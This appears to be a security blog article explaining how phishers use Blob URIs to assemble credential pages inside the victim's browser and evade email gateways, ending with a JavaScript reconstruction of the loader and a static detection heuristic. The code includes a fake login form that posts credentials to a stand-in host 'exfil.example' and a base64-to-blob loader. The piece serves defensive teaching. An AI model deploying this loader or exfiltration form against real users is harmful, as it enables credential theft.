Using Blob URLs to Bypass SEGs and Evade Analysis
Attackers keep looking for new ways to deliver their attacks, and phishing is where this is most visible. A conventional phishing page is hosted on a server with a public IP address and URL; once that source is identified, defenders can block the address or domain and feed the URL to reputation and sandbox services, rendering the campaign useless. The ideal delivery technique, from the attacker's point of view, would therefore be one in which only the intended victim can reach the page and investigators cannot fetch it at all. Researchers have recently documented one such technique: a phishing page that cannot be traced back to any server because it is assembled locally, inside the victim's browser, and referenced through a Blob URI.
A binary large object, or blob, is an immutable chunk of raw data held in the browser's memory, commonly used as an intermediary between a page's script and data that would otherwise have to be fetched from, or sent to, a server. A page can ask the browser for a temporary `blob:` URL that points at such an object; this is a Blob Uniform Resource Identifier, or Blob URI. The URI is valid only in the browser session and origin that created it and cannot be resolved from the network by anyone else. YouTube's player is a familiar example: the video element's source is a blob: URL created for a media source that the player script feeds piece by piece, so a user cannot simply copy a direct link to the video file. Used legitimately, Blob URIs provide a measure of access control and reduce network traffic by letting scripts work on data that is already held locally. Threat actors, however, have discovered that the same mechanism can deliver a credential phishing page entirely inside the browser, bypassing email security gateways and signature-based URL detection, which never see the phishing HTML as a separately fetched resource.
The Blob URI credential phishing attack works like this. First, the attacker sends a bait email containing a link to an intermediary page on an allowlisted service, such as OneDrive. That page is abused to redirect the victim to an attacker-controlled HTML page. This loader page carries the actual phishing page as an encoded string; a short script decodes it, wraps the result in a Blob object, obtains a blob: URL for it, and navigates the tab to that URL. The phishing page therefore never exists on a server: it is assembled in the victim's browser, and the blob: URL it is displayed under cannot be opened by anyone else. Although the page itself is local, its form handler still exfiltrates submitted credentials over the network to another threat-actor endpoint, which is the one network indicator the technique cannot avoid. Investigators have observed this technique used against several kinds of credentials, including OneDrive logins and tax accounts.
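To make the loader step concrete, here is an added example, written for this page rather than taken from any observed campaign: a minimal reconstruction of the blob: URL loader described above, followed by a static heuristic a defender can run over page source to flag such loaders. The phishing HTML, the exfiltration host `exfil.example`, the use of base64 as the payload encoding, the marker list and the scoring threshold are all constructed assumptions for illustration.

```javascript
// Added example (not from any observed campaign): a minimal reconstruction of
// the blob: URL loader, plus a static heuristic for flagging such loaders.
// The phishing HTML, the host "exfil.example", base64 as the payload encoding
// and the marker list are constructed for illustration.

// Constructed stand-in for the decoded phishing page. In a real campaign this
// would render a fake OneDrive login; the only part that must touch the
// network is the credential POST.
const PHISHING_HTML = `<!doctype html>
<form id="f"><input name="user"><input name="pass" type="password"></form>
<script>
document.getElementById("f").onsubmit = async (e) => {
  e.preventDefault();                      // stay on the blob: page
  await fetch("https://exfil.example/collect", {
    method: "POST", body: new URLSearchParams(new FormData(e.target)) });
};
</script>`;

// The loader page carries the phishing page as a base64 string (assumed
// encoding; any reversible encoding works), so no second HTML file is fetched.
function encodePayload(html) { return btoa(html); }
function decodePayload(b64) { return atob(b64); }

// Browser-only step: wrap the decoded HTML in a Blob, mint a blob: URL for it
// and navigate the tab there. The URL has the form
// blob:https://<loader-origin>/<uuid>, is bound to the loader's origin and to
// this browsing session, and cannot be fetched by anyone else.
function openAsBlob(html) {
  const blob = new Blob([html], { type: "text/html" });
  const url = URL.createObjectURL(blob);
  window.location.href = url;
  return url;
}

// What the attacker-controlled loader page would contain (constructed).
const SAMPLE_LOADER = `<script>
const p = "${encodePayload(PHISHING_HTML)}";
const b = new Blob([atob(p)], { type: "text/html" });
location.href = URL.createObjectURL(b);
</script>`;

// Defender side: the blob: page never crosses the network, but the loader page
// does. A cheap static check looks for the combination of an inline decode, a
// Blob construction, an object-URL mint and a navigation. Each marker is
// common on its own; all of them together in one small page is not.
const LOADER_MARKERS = [
  /\batob\s*\(/,
  /new\s+Blob\s*\(/,
  /URL\.createObjectURL\s*\(/,
  /(location\.(href|assign|replace)|window\.open)\s*[=(]/,
];

function scoreLoader(source) {
  const hits = LOADER_MARKERS.filter((re) => re.test(source)).length;
  return { hits, suspicious: hits >= 3 };   // threshold is an assumption
}

// Stand-alone run: round-trip the payload and score both pages.
console.log(decodePayload(encodePayload(PHISHING_HTML)) === PHISHING_HTML);
console.log(scoreLoader(SAMPLE_LOADER));   // { hits: 4, suspicious: true }
console.log(scoreLoader(PHISHING_HTML));   // { hits: 0, suspicious: false }
```

In a browser, the loader would call `openAsBlob(decodePayload(p))`; the address bar then shows a `blob:` URL carrying the loader page's origin, which is itself a visible tell for a user who expected a OneDrive or Microsoft domain. A gateway that detonates the emailed link sees only the redirect and the loader page, never the decoded phishing HTML, so the heuristic above targets the loader, and the POST to the exfiltration host is what network monitoring should alert on. Treat the score as a triage signal only: legitimate download buttons and media players also mint blob: URLs, so a hit warrants inspection of the decoded payload rather than an automatic block.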